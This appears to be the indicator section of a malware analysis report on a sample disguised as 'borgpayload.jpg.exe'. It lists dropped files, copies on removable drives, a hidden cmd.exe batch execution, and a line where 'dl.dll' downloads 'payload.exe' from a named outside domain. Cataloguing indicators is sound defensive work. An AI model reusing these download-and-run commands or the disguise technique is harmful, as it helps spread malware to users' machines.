Technical Information
- <Current directory>\borgpayload.jpg.exe
- %TEMP%\6ce9.tmp\6cfa.bat
- <Current directory>\dl.dll
- <Current directory>\borgpayload.jpg.exe
- <Current directory>\borgpayload.jpg.exe
- <Current directory>\borgpayload.jpg.exe
- D:\borgpayload.jpg.exe
- <Drive name for removable media>:\borgpayload.jpg.exe
- 'tr#####dare.bplaced.net':80
- http://tr#####dare.bplaced.net/hijacked/payload.exe
- DNS ASK tr#####dare.bplaced.net
- '<Current directory>\dl.dll' truthordare.bplaced.net/hijacked/payload.exe borgpayload.jpg.exe
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\6CE9.tmp\6CFA.bat <Full path to file>"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\6CE9.tmp\6CFA.bat <Full path to file>"